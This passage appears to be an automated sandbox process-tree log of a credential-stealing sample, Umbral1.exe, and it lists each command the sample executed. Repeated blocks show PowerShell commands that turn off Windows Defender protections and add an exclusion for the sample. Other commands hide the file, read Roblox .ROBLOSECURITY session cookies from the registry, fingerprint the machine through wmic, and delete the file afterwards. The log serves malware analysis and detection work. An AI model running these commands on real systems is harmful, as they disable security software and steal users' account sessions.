        "wmic.exe" computersystem get totalphysicalmemory
        307⤵
        
        PID:740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        307⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        307⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1656
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        308⤵
        
        PID:776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        307⤵
        Detects videocard installed
        
        PID:3708
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        307⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1716
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        308⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        305⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        304⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        303⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        302⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        301⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        300⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        299⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        298⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        297⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        296⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        295⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        294⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        293⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        292⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        291⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        290⤵
        
        PID:660
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        289⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        288⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        287⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        286⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        285⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        284⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        283⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        282⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        281⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        280⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        279⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        278⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        277⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        276⤵
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        275⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        274⤵
        
        PID:1204
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        273⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        272⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        271⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        270⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        269⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        268⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        267⤵
        
        PID:5096
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        268⤵
        Views/modifies file attributes
        
        PID:972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        268⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        268⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        268⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        269⤵
        
        PID:3944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        268⤵
        
        PID:3036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        268⤵
        
        PID:3976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        268⤵
        
        PID:4612
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        268⤵
        
        PID:1228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        269⤵
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        268⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4516
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        268⤵
        Detects videocard installed
        
        PID:2760
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        268⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2236
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        269⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        266⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        265⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        264⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        263⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        262⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        261⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        260⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        259⤵
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        258⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        257⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        256⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        255⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        254⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        253⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        252⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        251⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        250⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        249⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        248⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        247⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        246⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        245⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        244⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        243⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        242⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        241⤵
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        240⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        239⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        238⤵
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        237⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        236⤵
        
        PID:912
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        235⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        234⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        233⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        232⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        231⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        230⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        229⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        228⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        227⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        226⤵
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        225⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        224⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        223⤵
        
        PID:3112
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        224⤵
        Views/modifies file attributes
        
        PID:4536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        225⤵
        
        PID:2736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        224⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        224⤵
        
        PID:2944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        224⤵
        
        PID:4160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        224⤵
        
        PID:4436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        224⤵
        
        PID:4268
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        224⤵
        
        PID:4844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        224⤵
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        224⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        224⤵
        Detects videocard installed
        
        PID:1060
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        224⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2556
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        225⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:428
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        222⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        221⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        220⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        219⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        218⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        217⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        216⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        215⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        214⤵
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        213⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        212⤵
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        211⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        210⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        209⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        208⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        207⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        206⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        205⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        204⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        203⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        202⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        201⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        200⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        199⤵
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        198⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        197⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        196⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        195⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        194⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        193⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        192⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        191⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        190⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        189⤵
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        188⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        187⤵
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        186⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        185⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        184⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        183⤵
        
        PID:3188
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        182⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        181⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        180⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        179⤵
        
        PID:1104
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        180⤵
        Views/modifies file attributes
        
        PID:1164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:1308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        180⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        180⤵
        
        PID:1296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        180⤵
        
        PID:4612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        180⤵
        
        PID:4440
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        180⤵
        
        PID:1316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        180⤵
        
        PID:4904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        180⤵
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
